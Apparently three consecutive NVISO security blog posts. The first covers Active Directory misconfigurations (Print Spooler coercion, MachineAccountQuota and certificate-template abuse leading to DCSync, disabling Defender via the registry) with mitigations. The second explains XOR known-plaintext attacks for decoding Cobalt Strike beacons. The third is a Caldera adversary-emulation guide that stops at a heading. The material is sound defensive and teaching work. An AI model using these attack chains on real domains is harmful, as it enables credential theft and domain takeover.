We now have the hash of the KRBTGT account (Figure 22), which means that we successfully compromised the domain.

Thanks to the print spooler service running by default on DCs, we were able to trigger the service and force it to authenticate to the WinServ-2022 server.

To mitigate this vulnerability, Microsoft recommends disabling the print spooler service on all domain controllers as a security best practice.

One way to identify domain controllers where the print spooler service is running is by using PingCastle, as shown in Figure 23. In this case, only the spooler module was executed and we can see that the service is active on the DC.

Figure 23: PingCastle scan returning all domain controllers where the Print Spooler service is running

As mentioned above, the recommendation is to disable the print spooler service on domain controllers. This can be done using a GPO that will disable the service:

Figure 24: GPO to disable the Print Spooler service

If the print spooler service was disabled, an attacker would not have been able to force the domain controller to connect to WinServ-2022.

Figure 25: Error message when the Print Spooler is disabled

Users can create machine accounts

First of all, let’s define what a machine account in Active Directory is. A machine account (or computer account) is an Active Directory object that represents a computer or a device connected to the domain. Like user accounts, machine accounts have different attributes that store information about the device, can be a member of security groups, can have Group Policies applied, etc.

By default, in Active Directory, everyone can create up to 10 machine accounts in the domain. This is due to the ms-DS-MachineAccountQuota attribute. According to the Microsoft documentation, this attribute is “the number of computer accounts that a user is allowed to create in the domain”.

This setting is defined in the Default Domain Controllers Policy.

Figure 26: Default value of the "Add workstation to domain" setting in the Default Domain Controllers Policy

Moreover, the current value of ms-DS-MachineAccountQuota can be found using this PowerShell command:

Get-ADObject ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota
Figure 27: Output of the above command

In this example, the Default Domain Controller Policy Group Policy Object (GPO) and the attribute have not been modified and Authenticated users can create up to 10 computer accounts (Figure 26 and Figure 27).

To create a new machine account, the PowerMad module, written by Kevin Robertson, can be used as follows:

Figure 28: Creation of a new machine account using PowerMad

As expected, after creating 10 machine accounts, the user will no longer be able to create new machine accounts:

Figure 29: Error message when reaching the MachineAccountQuota limit

There is no attribute indicating the number of accounts already created by a specific user. However, the mS-DS-CreatorSID attribute of computer objects can be used to determine how many computer accounts a given user has created.

This information can be retrieved by using the Get-MachineAccountCreator command from the PowerMad module:

Figure 30: List of all machine accounts and their creator

It is also possible to check who created a specific machine account by using the Active Directory PowerShell module:

Get-ADComputer MyComputer -Properties mS-DS-CreatorSID | Select-Object -Expandproperty mS-DS-CreatorSID | Select-Object -ExpandProperty Value | Foreach-Object {Get-ADUser -Filter {SID -eq $_}}
Figure 31: Information about the creator of the "MyComputer" machine account

The user who created the machine account will be granted write access to different attributes such as msDS-AllowedToActOnBehalfOfOtherIdentity, ServicePrincipalNames, DnsHostName, and so on.

Tools like KrbRelayUp leverage this default setting to escalate privileges to NT AUTHORITY\SYSTEM on a local system. An attacker can also change the msDS-AllowedToActOnBehalfOfOtherIdentity attribute to abuse Resource-Based Constrained Delegation, for example.

If a Public Key Infrastructure (PKI) is present in the domain, an attacker can take advantage of the default Machine certificate template to perform a DCSync attack and dump hashes of all users and computers. Let’s take a look at how an attacker can proceed to retrieve the hashes.

After creating a new machine account, an attacker can modify the ServicePrincipalNames and the DnsHostName attributes. First, we remove the service principal names containing the initial DnsHostName and then we set the DnsHostname attribute to the domain controller FQDN, as follows:

Figure 32: Default values of the new machine account attributes
Figure 33: Modification of the DNSHostName attribute of the machine account to the DC FQDN

After that, an attacker can request a certificate for the machine account using the Machine template and they will get a certificate for the domain controller. This will allow the attacker to retrieve the NT hash of the domain controller machine account.

Figure 34: Retrieval of the NT hash of the domain controller machine account

The hash can then be used to perform a DCSync attack:

Figure 35: DCsync attack using

By creating a new computer object, editing its properties and abusing the default Machine template, we were able to dump the hashes of all users. The hashes can then be used to perform a “Pass-the-Hash” attack and move laterally to other systems.

This could have been avoided if some mitigation measures had been put in place.

First, computer objects created using the PowerMad tool are stored in the Computers container, unlike computer objects created by IT administrators, which should be placed in dedicated OUs since Group Policies cannot be applied to the container. This can be used to identify objects created by malicious users.

Moreover, it is recommended to create a new group (or a new account) that will be granted the required permissions to create new machine accounts. This way, only members of this group will be allowed to create new computer objects and malicious users will not be able to perform the attack.

This can be done by modifying the Default Domain Controller Policy. To do so, go to Computer configuration > Policies > Windows Settings > Security Settings > User Right Assignment > Add workstations to domain: Remove the ‘Authenticated Users’ group and add the new group or account previously created.

Authenticated users will no longer be able to create new machine accounts, as shown in Figure 36.

Figure 36: Error message when a user tries to create a new machine account (after removing the permission of the Authenticated Users group)

Unchanged GPOs are not reprocessed on Domain Controllers

All domain joined systems refresh and apply applicable group policies at specific intervals.

For security policy settings, the Group Policy engine works differently: these settings are automatically re-applied every 16 hours even if the GPO has not been changed.

However, by default, most GPO settings are only applied when they are new or when they have been changed since the last time the client requested them. This could allow an attacker to modify a registry key that is normally managed through a GPO to disable specific security measures, for example.

In the following example, a company enforces the Windows Defender Real-Time Protection through a GPO:

Figure 37: GPO to enable Windows Defender Real-Time Protection

If a user tries to download malicious files, Windows Defender will immediately quarantine the files:

Figure 38: Windows Defender alert when downloading a malicious file

If a user can modify the Windows Defender Real-Time Protection registry key, they will be able to download and run malicious tools on the system. In this case, by setting the value to 1, the user disables the Real-Time Protection feature:

Figure 39: Modification of the DisableRealtimeMonitoring registry key

As expected, the Real-Time Protection is now disabled and the user can download malicious files:

Figure 40: Comparison when downloading a malicious file with Real-Time Protection enabled and disabled

To mitigate this vulnerability, it is recommended to ensure that registry and security policy settings defined in GPOs are always enforced and re-applied on systems even if the GPO has not changed. This way, any unauthorized changes made locally will be overridden after 5 minutes to 16 hours.

In the Default Domain Controller policy, under Computer Configuration > Administrative Templates > System > Group Policy, configure the following two settings as follows:

  1. Configure security policy processing:
    • Process even if the Group Policy objects have not changed: Enabled
    • Do not apply during periodic background processing: Disabled
  2. Configure registry policy processing:
    • Process even if the Group Policy objects have not changed: Enabled
    • Do not apply during periodic background processing: Disabled

The following settings can also be re-applied even if they have not been changed:

  • Internet Explorer Maintenance
  • IP Security
  • Recovery Policy
  • Wireless Policy
  • Disk Quota
  • Scripts
  • Folder Redirection
  • Software Installation
  • Wired Policy

Moreover, enabling auditing for registry operations can help your organization identify suspicious changes.

To audit registry key modification, the “Audit object access” policy needs to be enabled using a GPO (Figure 41).

Figure 41: GPO for auditing registry key modifications

After that, auditing also needs to be enabled on the registry keys that you want to monitor (Figure 42).

Figure 42: Enable auditing on the registry keys in Regedit

In this case, each time the value of a registry key under Windows Defender is modified, an event will be generated in the Event Viewer and can be used by the Blue team to identify suspicious activities.

Modifications to registry keys can now be detected by looking at different event IDs (4656, 4657, 4660 and 4663).

In our example, we can see that the value of the DisableRealTimeMonitoring registry key was changed to 1 instead of 0:

Figure 43: Log showing that the value of the registry key has been modified

Password policy and least privilege

This section includes recommendations related to the password policy of service accounts and the KRBTGT account.

The recommendations included in this section should be adapted to your company policy, specific use cases and risk tolerance.

Service accounts

During the audits, we noticed that most of the time, there is no password policy for service accounts, allowing administrators to set weak passwords that can be easily brute forced. In a few cases, the password for service accounts was even included in their description.

As shown in the “Administrator accounts are allowed for delegation” section, we cracked the IIS account password because weak passwords are allowed as there is no password policy enforced for service accounts. This could have been prevented by configuring a proper password policy.

For example, Microsoft recommends using passwords of at least 25 characters for service accounts and implementing a process to change them regularly. It is also recommended to use a dedicated Organizational Unit to manage these accounts, making it easier for administrators to manage the security settings applied to them.

Finally, we also noticed that some organizations tend to use personal administrator accounts as service accounts. This means that if someone manages to compromise a service account used by an administrator, they will gain all privileges associated with that account. As a best practice, service accounts should only be granted the permissions they need.

KRBTGT account

The KRBTGT account is a default account that exists in all Active Directory domains. Its main purpose is to act as the Key Distribution Center (KDC) service account, which handles all Kerberos requests in the domain. As mentioned above, if an attacker manages to compromise this account, they will be able to forge Golden Tickets and gain access to domain resources.

We noticed that many organizations do not change the KRBTGT password on a regular basis. Based on 25 audits, we found that the KRBTGT password is changed every 1855 days on average, and two organizations did not change the password for more than 5500 days, that’s over 15 years!

This means that an attacker who was able to compromise the KRBTGT hash and has not yet been detected can maintain their access for 5 years on average (even without creating a backdoor).

It is recommended to change the password of the KRBTGT account regularly, for example every 6 months or every year.

Note that the password must be changed twice because the password history value for this account is set to 2. This means that the two most recent passwords will be valid for all already existing tickets. Before changing the password for the second time, best practices recommend waiting at least 24 hours to avoid invalidating existing Kerberos tickets and requiring everyone and everything (computers, servers, service accounts, etc.) to re-authenticate.

However, if you suspect that the KRBTGT account has been compromised by an attacker, the password should also be reset. This will prevent anyone who has access to its hash from generating Golden Tickets, for example.

It is important to keep in mind that changing the KRBTGT password alone will not ensure the security of your organization. If someone managed to get its hash once, they will probably be able to compromise it again if no other security measures are implemented.


In this blog post, we went over the most common misconfigurations and default settings discovered when doing Active Directory assessments of different environments. These configurations can have a significant impact on the security of your organization and allow attackers to gain access to the keys to your kingdom.

Therefore, it is important to know your environment. Moreover, there should be a security baseline which should always be followed and reviewed regularly.

  • Is this configuration still required?
  • Is there any potential risk, or any new vulnerabilities associated with this service?
  • Is there a more secure approach?

These are some of the questions IT administrators must repeatedly ask themselves to maintain a certain security posture.

Moreover, some tools allow you to perform automatic auditing of your AD environment and identify settings that could put your organization at risk:

  • PingCastle: It scans your environment to identify security vulnerabilities and weaknesses. It includes checks for stale objects (legacy protocols, never-expiring passwords, etc.), privileged accounts (Kerberoastable admin accounts, delegations, etc.) and anomalies (print spooler, ADCS, audit policy, etc.).
  • BloodHound: It allows you to visualize Active Directory attack paths. It can be used to identify potential security vulnerabilities that could be exploited by an attacker with Domain Users privileges to elevate their privileges to Domain Admins, as an example.
  • Testimo: It is a PowerShell Module created by EvotecIT that helps you identify security issues as well as other operational issues. It can also generate HTML reports showing the commands executed, their output, a description and links to external resources.

While PingCastle and Testimo are more defender oriented, BloodHound is more attacker oriented.

In addition to performing regular scans, IT administrators should always keep an eye on newly discovered vulnerabilities, as a configuration that is considered safe can be the cause of a disaster a few years later. Indeed, it is important to note that no tool can guarantee complete security for your AD environment.

NVISO can help you identify and remediate vulnerabilities and weaknesses in your environment by performing an adversary emulation assessment that simulates real-world threats, for example. These assessments will help you improve your security posture and protect your organization from potential threats.

To learn more about how we can help you, feel free to reach out or to check our website.

Bastien Bossiroy

Bastien is a Senior Security Consultant at NVISO where he is part of the Software Security and Assessment team. He focuses mainly on web applications testing and Active Directory environments auditing.

During his free time, Bastien enjoys testing different Active Directory configurations to understand how they work and how specific settings or misconfigurations can impact the security of the environment.

XOR Known-Plaintext Attacks

In this blog post, we show in detail how a known-plaintext attack on XOR encoding works, and automate it with custom tools to decrypt and extract the configuration of a Cobalt Strike beacon. If you are not interested in the theory, just in the tools, go straight to the conclusion 🙂 .

A known-plaintext attack (KPA) is a cryptanalysis method where the analyst has the plaintext and ciphertext version of a message. The goal of the attack is to reveal the encryption algorithm and key.

XOR encoding intro

Let’s first agree on a notational convention: decimal integers are written as plain digits (e.g. 73), while hexadecimal integers are written with a 0x prefix (e.g. 0x49).

Let’s take the following plaintext message as example:

IT security company NVISO was founded in 2013!

And we XOR encode this with key ABC.
Like this:

Figure 1: XOR encoding with key ABC

This is how it works: character per character, we perform an 8-bit XOR operation.

  • We take the first character of the plaintext message (I) and the first character of the key (A), we lookup their numeric value (according to the ASCII table): I is 0x49 and A is 0x41. Xoring 0x49 and 0x41 gives 0x08. In the ASCII table, 0x08 is a control character and thus unprintable (hence the thin rectangle in figure 1: this depicts unprintable characters).
  • We take the second character of the plaintext message (T) and the second character of the key (B), we lookup their numeric value (according to the ASCII table): T is 0x54 and B is 0x42. Xoring 0x54 and 0x42 gives 0x16. In the ASCII table, 0x16 is a control character and thus unprintable.
  • We take the third character of the plaintext message (the space character) and the third character of the key (C), we lookup their numeric value (according to the ASCII table): the space character is 0x20 and C is 0x43. Xoring 0x20 and 0x43 gives 0x63. In the ASCII table, 0x63 is lowercase letter c (lowercase and uppercase letters have different values: they have their 6th bit toggled).
  • We take the fourth character of the plaintext message (s) and the first character of the key (A), we lookup their numeric value (according to the ASCII table): s is 0x73 and A is 0x41. Xoring 0x73 and 0x41 gives 0x32. In the ASCII table, 0x32 is digit 2. Since our XOR key (ABC) is only 3 characters long, and the plaintext is longer than 3 characters, we start repeating the key. That is why we start again with the first character of the key (A) after having used the last character of the key (C) for the previous character. We roll the key.

This goes on, until we process the 46th character:

  • Character 1: we perform operation I xor A and that gives us an unprintable character
  • Character 2: we perform operation T xor B and that gives us an unprintable character
  • Character 3: we perform operation space xor C and that gives us character c
  • Character 4: we perform operation s xor A and that gives us character 2
  • and so on ….
  • Character 46: we perform operation ! xor A and that gives us character `

This example explains how we XOR a plaintext message with a key that is shorter than the plaintext message: Plaintext XOR Key -> Ciphertext.
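The rolling-key encoding described above can be reproduced in a few lines of Python (a minimal sketch using this article's example; the per-character values match the walkthrough for Figure 1):

```python
from itertools import cycle

def xor_encode(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with the repeating (rolling) key."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))

plaintext = b"IT security company NVISO was founded in 2013!"
ciphertext = xor_encode(plaintext, b"ABC")

# First bytes: 0x49^0x41=0x08, 0x54^0x42=0x16, 0x20^0x43=0x63 ('c'), 0x73^0x41=0x32 ('2')
# XOR is its own inverse: encoding the ciphertext again yields the plaintext.
assert xor_encode(ciphertext, b"ABC") == plaintext
```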

XOR cryptanalysis

XOR encoding has an interesting property, especially if you are interested in cryptanalysis. When you XOR the plaintext message with the ciphertext, you obtain the key: Plaintext XOR Ciphertext -> Key.

Figure 2: XORing plaintext and ciphertext gives keystream
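This keystream-recovery property is easy to verify in code (a sketch reusing the example plaintext and key ABC from above):

```python
from itertools import cycle

def xor_encode(data: bytes, key: bytes) -> bytes:
    """XOR data with a rolling (repeating) key."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))

plaintext = b"IT security company NVISO was founded in 2013!"
ciphertext = xor_encode(plaintext, b"ABC")

# XORing plaintext and ciphertext byte by byte reveals the repeating keystream.
keystream = bytes(p ^ c for p, c in zip(plaintext, ciphertext))
assert keystream == (b"ABC" * len(plaintext))[:len(plaintext)]
```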

That’s how XOR encoding works. Let’s now see how we can decode this, without knowing the key, neither the complete plaintext, but just with a part of the plaintext.

In the case we are dealing with here, we have the complete ciphertext and partial plaintext. Under certain circumstances (explained later), it is also possible to recover the key in such a case.
Assume that the partial plaintext we have is NVISO: we know that the string NVISO appears in the plaintext (unknown to us), but we don’t know where.
So what we will do here is repeat the string NVISO as many times as necessary to make it as long as the ciphertext (and hence as long as the plaintext). Like this:


When we perform XOR operations with the ciphertext and the repeating NVISO string, we obtain this result:

Figure 3: XORing ciphertext with partial known plaintext

What we see here is a string of 3 characters (CAB) that starts to repeat itself (CA) and has exactly the same length as the partial plaintext: NVISO is 5 characters, CABCA is 5 characters.
This is how you can identify the key: you look for repetition that, in total, is as long as the partial plaintext. Substring CABCA is the only string that satisfies this condition in the XOR result of our example. yy and bib are also repeating strings, but they are shorter than the partial plaintext (5 characters).
And this also illustrates the most important condition for a partial KPA attack on XOR encoding to succeed: the partial plaintext must be longer than the XOR key. If the partial plaintext is as long, or shorter, than the XOR key, we will not observe repetition, and thus we will not be able to identify the key.
The string that contains our XOR key is CABCA. Since we assume that we are dealing with a rolling XOR key, the key can be ABC, BCA or CAB.
Let’s expand that string that contains our XOR key, to the left and to the right, so that it is as long as the ciphertext:

Figure 4: expanding the keystream to the left and to the right

And finally, use that as the key stream for the XOR operation:

Figure 5: XORing the ciphertext with the expanded keystream

And now we have recovered the complete plaintext, by knowing a part of it that is longer than the XOR key used to encode the message.
We have designed our example so that the ciphertext and partial plaintext align, like this:

Figure 6: for the purpose of this example, the plaintext and partial known plaintext align

If the number of characters preceding the ciphertext of partial plaintext NVISO were not an exact multiple of the length of NVISO (20 / 5 = 4), then the ciphertext and partial plaintext would not align properly, and we would not calculate the correct key.
For example, like this (I removed the leading word IT):

Figure 7: more likely, the partial known plaintext will not align

But this can be solved by “rolling” the partial plaintext. If our partial plaintext is 5 characters long, we have to generate 5 partial plaintext streams that we have to check:

Figure 8: trying with the 4th potential keystream

In this example, it’s the fourth stream we generated that will align, and will thus reveal the key.

A partial KPA attack on XOR encoded ciphertext with a rolling XOR key, requires a partial, known plaintext that is longer than the XOR key. The bigger the difference in length, the easier it will be to identify the XOR key.
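The whole procedure described above (XOR the known plaintext against every offset of the ciphertext, look for repetition, rotate the repeating fragment back into a key) can be sketched as a short Python function. This is our own illustration of the technique, not the code of any existing tool:

```python
def recover_xor_key(ciphertext: bytes, known: bytes) -> list:
    """Partial known-plaintext attack on a rolling XOR key: slide the known
    plaintext across every offset of the ciphertext, XOR, and keep fragments
    that repeat with a period shorter than the known plaintext."""
    candidates = []
    for offset in range(len(ciphertext) - len(known) + 1):
        # XOR the known plaintext against this position of the ciphertext
        fragment = bytes(c ^ p for c, p in zip(ciphertext[offset:], known))
        # the key must be shorter than the known plaintext for repetition to show
        for period in range(1, len(known)):
            if all(fragment[i] == fragment[i % period] for i in range(len(fragment))):
                # rotate the repeating fragment so the key lines up with offset 0
                key = bytes(fragment[(j - offset) % period] for j in range(period))
                if key not in candidates:
                    candidates.append(key)
                break  # keep only the shortest period for this offset
    return candidates
```

Sliding over every offset also covers the "rolling the partial plaintext" step: each offset corresponds to one possible alignment of the known plaintext.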

Doing all this decoding manually is a very labor-intensive process. That’s why we have a tool, xor-kpa, to automate it:

Let’s illustrate with our example.
This is the encoded file (ciphertext):

Figure 9: the ciphertext

This is the file that contains the known plaintext:

Figure 10: the partial known plaintext

Running xor-kpa with these 2 files as input gives:

Figure 11: xor-kpa lists potential keys

We see that the tool recovers keystream CABCA, just like we did, and infers the right key from it: ABC.
Extra tells us how many characters are repeating (thus how many extra characters the partial plaintext has compared to the XOR key). The bigger this number, the more confident we can be that the correct key was recovered.
Divide tells us how many times the complete XOR key appears in the keystream.
And counts tells us how many times this keystream was found (in our example, that would mean that the word NVISO appears more than once in the plaintext). xor-kpa can also do the decoding for us (using option -d):

Figure 12: decoding with xor-kpa

And here is an example, where the partial known plaintext is longer (was founded in 2013):

Figure 13: longer partial known plaintext
Figure 14: longer keystream

As the recovered keystream is much longer, the probability to extract the correct key is higher.


NVISO regularly encounters malware or artefacts that use XOR encoding with a key longer than one byte. The xor-kpa tool helps us decode such files.

The tool comes with some predefined plaintexts that often appear in samples (like “This program cannot be run in DOS mode”). We also included plaintexts for Cobalt Strike beacons.

When you run xor-kpa with the help option, you get a list of predefined plaintexts:

Figure 15: xor-kpa’s options, including the predefined known plaintexts

All the predefined plaintexts that start with cs-, are for Cobalt Strike.

As a last example, we try to decode a file suspected to be an encoded Cobalt Strike beacon (beacon.vir). We will use cs-key-dot: this is the invariable part of the public key stored inside the beacon configuration for Cobalt Strike version 4:

Figure 16: xor-kpa displaying potential keys

Several potential keys are recovered, and the most likely key is presented at the end of the output. Potential keys are sorted by the amount of repetition in the keystream: the more repetition, the likelier it is that the key is correct, and so it is listed lower than keystreams with less repetition.

We can now use option -d to decode the sample with the most probable key (the last one in the list), and pipe the output to 1768, a tool to extract beacon configurations:

Figure 17: xor-kpa decoding the beacon and 1768 extracting the beacon configuration

Because of the decoding with xor-kpa, 1768 is able to extract the proper configuration.


Didier Stevens

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis.

A Beginner’s Guide to Adversary Emulation with Caldera


Target Audience

The target audience for this blog post is individuals who have a basic understanding of cybersecurity concepts and terminology and are looking to expand their knowledge of adversary emulation. This post delves into the details of adversary emulation with the Caldera framework, exploring the benefits it offers. By catering to a beginner-to-intermediate audience, the blog post aims to strike a balance between providing fundamental information for newcomers and offering valuable insights and techniques that can benefit individuals who are already familiar with the basics of cybersecurity.

What is Adversary Emulation

Adversary emulation is a methodology used to simulate the Tactics, Techniques, and Procedures (TTPs) used by known Advanced Persistent Threats (APTs), with the goal of identifying vulnerabilities in an organization’s security defenses. By emulating real-world attacks and incident response techniques, such as exploitation of vulnerabilities and lateral movement within a network, cybersecurity teams can gain a better understanding of their security posture and identify areas for improvement.

The Need for Adversary Emulation

Adversary emulation can help organizations test their security defenses against real-world threats. Some of the benefits the emulation offers are:

  • Identifying vulnerabilities: Adversary emulation assists organizations in identifying vulnerabilities, weaknesses or misconfigurations in their security defenses that might not have been detected through conventional security testing. This information can enhance the existing detection mechanisms by creating new alerts and rules that are triggered when similar activities are detected. The emulation results can also work as a guide in prioritizing mitigation and patching activities.
  • Improving security controls: By identifying weaknesses in their security defenses, organizations can make informed decisions about how to improve their security controls. This can include implementing new security technologies, updating security policies, or providing additional security awareness training to employees.
  • Measuring security effectiveness: Adversary emulation enables organizations to assess the effectiveness of their security defenses within a controlled environment. Through analyzing the emulation results, organizations can have a clearer understanding of how well their incident response plan operates in real-world scenarios. If any gaps or inefficiencies are identified, the plan can be refined based on the new data.
  • Staying ahead of emerging threats: Adversary emulation exercises can help organizations stay ahead of emerging threats by testing their security defenses against new and evolving attack techniques. This can help organizations prepare for future threats and ensure that their security defenses are effective in protecting against them.

Emulation vs. Simulation

Emulation involves creating a replica of a specific system or environment, such as an operating system, network, or application. It provides a more realistic testing environment, which can help identify vulnerabilities and test the effectiveness of security controls in a more accurate and reliable way. However, creating an emulation environment can be time-consuming and resource-intensive, and it may not always be feasible to replicate every aspect of a real-world environment.

Simulation, on the other hand, involves creating a hypothetical scenario that models a real-world attack. It is often quicker and easier to set up, and can be used to test response plans and procedures without the need for a complex emulation environment. However, simulations may not always provide a completely accurate representation of a real-world attack scenario, and the results may be less reliable than those obtained through emulation.

The Caldera Framework

MITRE’s Caldera project is an open-source platform that allows organizations to automatically emulate the tactics, techniques, and procedures (TTPs) used by real-world APTs. The platform is designed to be modular, which means that it can be customized to fit the specific needs of an organization. More information can be found in the official documentation and on GitHub. Red team operators can benefit from this by manually executing TTPs and blue team operators can run automated incident response actions. Caldera is also highly extensible, meaning that it can be integrated with other security tools to provide a comprehensive view of an organization’s security defenses. Moreover, it is built on the MITRE ATT&CK framework which is where the platform draws all the Tactics, Techniques and Procedures (TTPs) from.

The most common use cases of this framework include, but are not limited to:

  • Autonomous Red Team Engagements: This case is used to emulate the TTPs of known adversary profiles to discover gaps across an infrastructure, test the defenses currently in place and train operators on detecting different threats.
  • Manual Red Team Engagements: This case allows red team operators to replace or extend the attack capabilities of a scenario, giving them more freedom and control over the current emulation.
  • Autonomous Incident Response: This case is used by blue team operators to perform automated incident response actions to aid them in identifying TTPs and threats that other security solutions may not detect and/or prevent.

Caldera consists of two main components:

  • The core system, which is the framework’s code, including an asynchronous command-and-control (C2) server with a REST API and a web interface.
  • Plugins which are separate repositories that expand the core framework capabilities and provide additional functionality. Examples include agents, GUI interfaces, collections of TTPs and more.

Figure 1 below shows the screen we are greeted with when we log in as either the red or the blue user, together with some basic terminology.

Figure 1: Caldera’s Main Menu
  1. Agents: An agent is another name for a Remote Access Trojan (RAT). These programs, written in any language, execute an adversary’s instructions on compromised systems (victims). Often, an agent will communicate back to the adversary’s server through an internet protocol such as HTTP, UDP or DNS. Agents also beacon into the C2 on a regular basis, asking the adversary if there are new instructions. If a beacon misses a regularly scheduled interval, there is a chance the agent itself has been discovered and compromised.
  2. Abilities: An ability is a specific set of instructions to be run on a compromised host by an agent immediately after sending the first beacon in.
  3. Adversaries: Adversary profiles are groups of abilities, representing the tactics, techniques, and procedures (TTPs) of known real-world APT groups. Adversary profiles are used when running an operation to determine which abilities will be executed.
  4. Operations: An operation is an attack scenario which uses the TTPs of pre-configured adversary profiles. An operation can be run automatically where the agents and the C2 server run without the operator’s interference and can only run tasks in the adversary profile. On the other hand, there is the manual mode where the operator approves every command before it is tasked to an agent and executed. Additionally in manual mode the operator can add extra TTPs. In order to run an operation at least one agent must be active.
  5. Plugins: They provide additional functionality over the usage of the framework.
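To make the “ability” concept more tangible, the sketch below shows the general shape of a Caldera ability definition, which lives in a YAML file. The ID, wording and commands here are our own illustration, not an official ability shipped with the framework:

```yaml
- id: 00000000-0000-0000-0000-000000000001   # illustrative UUID
  name: List local users
  description: Enumerate local accounts on the compromised host
  tactic: discovery
  technique:
    attack_id: T1087.001
    name: "Account Discovery: Local Account"
  platforms:
    linux:
      sh:
        command: cut -d: -f1 /etc/passwd
    windows:
      psh:
        command: Get-LocalUser | Select-Object Name
```

Each platform maps to an executor (sh, psh, …) and the command that executor should run; adversary profiles are then simply ordered collections of such abilities.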

Configuring an Agent

When we select “agents” from the figure 1 menu above, we are greeted with the page shown in figure 2.

Figure 2: Agent’s Menu

If we select the “Configuration” button, a new window opens where we can configure different options for all the agents created afterwards.

Figure 3: Agent’s Configuration Menu
  • Beacon Timer(s) = This field sets the minimum and maximum number of seconds the agent will take to beacon back home.
  • Watchdog Timer(s) = This field sets the number of seconds an agent has to wait, if the server is unreachable, before it is killed.
  • Untrusted Timer(s) = This field sets the number of seconds the server has to wait before marking a missing or unresponsive agent as untrusted. Furthermore, operations will not generate new links or send new instructions to untrusted agents.
  • Implant Name = This field sets the name for the newly created agents.
  • Bootstrap Abilities = This is a list of abilities to be run when a new agent beacons back to the server. By default, it runs a command which clears the command history.
  • Deadman Abilities = This is a list of abilities to be run immediately before an agent is killed.

To deploy an agent, we can press the “Deploy an Agent” button and we are greeted with this page. For this example, the agent Sandcat will be used.

By deploying the agent we refer to the process of installing and setting up the agent on the target system to enable it to perform specific actions or functions such as: monitoring, management, data collection, exploitation, reconnaissance and many more.

In figure 4, we can select the agent we want to deploy.

Figure 4: Agent Selection

Next, in figure 5, we have to select the operating systems the agent will be deployed on.

Figure 5: Agent Platform Selection

In this example, the Linux operating system has been chosen and Caldera provides us with some options and some pre-built commands. These commands can be copied and run directly in the victim’s terminal to deploy the agent. There are different variations for the deployment of the selected agent, such as:

  • It can be deployed as a red or blue agent.
  • It can be downloaded with a random name and start as a background process.
  • It can be deployed as a peer-to-peer (P2P) agent with known peers included in the compiled agent.

Moreover, the settings that can be modified are:

  • = This field is where the URL of the server’s address can be specified.
  • agents.implant_name = This field represents the name of the agent binary.
  • agent.extensions = This field takes a list of agent extensions to compile with the binary.
Figure 6: Agent’s Deployment Options

After an agent has been deployed it will be shown in the agent’s window, as illustrated in Figure 7.

Figure 7: Active Agents

If an agent is selected, a new window opens that shows some settings that can be modified along with some information about the system the agent is installed on and a kill switch, as shown in figure 8.

Figure 8: Agent’s Options After Deployment
  • Contact = This field specifies the protocol in which the agent will communicate with the server.
  • Sleeper Timer = This is the same as the Beacon Timer(s).

Configuring an Adversary Profile

Caldera comes with pre-defined profiles to choose from, loaded with known TTPs. There is also the option to create a new profile with mixed TTPs, providing an operator more flexibility over the operation. An adversary profile can be created and configured in the “adversaries” window as shown below in figure 9.

Figure 9: Creating A New Adversary Profile

After the “New profile” button is pressed, a name and a description for the new adversary profile will be asked.

A new ability can be added to the newly created profile by pressing the “add Ability” button.

Figure 10: Adding an Ability To an Adversary Profile

Then a new window will open where the specific ability can be chosen and configured, as depicted in figure 11.

Figure 11: Configuring an Ability

Here an already existing ability can be added by searching for it in the search bar or a new one can be configured by choosing a specific Tactic, Technique and Ability as shown above, along with all the details shown in the “Ability Details” section.

This newly created ability can be added to the TTPs of an already existing adversary profile by pressing the “Add Adversary” button. A new window will open to choose the appropriate profile.

Figure 12: Choosing an Adversary Profile

Finally, by pressing the “Save Profile” button the new profile is created and can be added to an operation.

Figure 13: Save The New Profile

Configuring an Operation

An operation can be created and configured in the “operations” window.

Figure 14: Creating A New Operation

After that a new window will open with all the modifiable settings.

Figure 15: Operation’s Configuration
  • Operation Name = Specifies the name of the operation.
  • Adversary = Specifies a specific adversary profile to emulate along with the pre-configured TTPs associated with this profile.
  • Fact Source = In this field a fact source can be attached to the current operation. This means that the operation will start with some knowledge of facts, which can be used to fill in different variables inside some abilities. A fact is identifiable information about the target machine that can be used by some abilities, such as usernames, passwords, hostnames etc.
  • Group = Specifies the collection of agents to run against
  • Planner = Specifies which logic library to use for the current operation. A planner is a Python module which contains logic that allows a running operation to make decisions about which abilities to use and in what order. The default planner is the “Atomic” which sends a single ability command to each agent in a group at a time. The order in which the commands are sent is the same as in the adversary’s profile.
  • Obfuscators = This field specifies which obfuscator to use to encode each command before they are sent to the agents. The available options are:
    • Base64 = Encodes the commands in base64
    • Base64jumble = Encodes the commands in base64 and then adds characters
    • Base64noPadding = Encodes the commands in base64 and then removes padding
    • Caesar cipher = Obfuscates the commands with the Caesar cipher algorithm
    • Plain text = No obfuscation
    • Steganography = Obfuscates the commands with image-based steganography
  • Autonomous = Specifies if the operations will run autonomously or manually. In manual mode the operator will have to approve each command.
  • Parser = Parsers are Python modules that are used to extract facts from command outputs. For instance, some reconnaissance commands can output file paths, usernames, passwords, shares etc.; these facts can then be fed back into future abilities. Parsers can also be used to create facts with relationships between them, such as username and password facts.
  • Auto-close = This option automatically terminates the operation when there are no further actions left. Alternatively, it keeps the operation open until the operator terminates it manually.
  • Run state = This option pauses the operation on start or runs immediately
  • Jitter = Specifies the minimum and maximum number of seconds the agents will check in with the server while they are part of an active operation.
  • Visibility = This option specifies how visible the operation should be to the defense. Abilities with higher visibility than the operation’s will be skipped.
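As an illustration of what the simplest of these obfuscators does, the sketch below encodes a command the way the Base64 option conceptually works before a command reaches an agent. This is our own illustration, not Caldera’s implementation:

```python
import base64

def obfuscate_base64(command: str) -> str:
    """Encode a command as base64, as the Base64 obfuscator conceptually does."""
    return base64.b64encode(command.encode()).decode()

def deobfuscate_base64(blob: str) -> str:
    """The agent-side reversal: decode the command before executing it."""
    return base64.b64decode(blob.encode()).decode()
```

The other variants build on the same idea: Base64jumble adds extra characters, Base64noPadding strips the trailing padding, and so on.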

After the “start” button is pressed, the operation will start and the results will be shown on the screen, indicating whether each task fails or succeeds. There is also the option to view each command and its result, as illustrated in figure 16.

Figure 16: Operation’s results

This was a red team operation, but in order to see the full picture some security solutions should also be running on the target systems to examine what was prevented and what went undetected.

Configure Automated Incident Response Plan

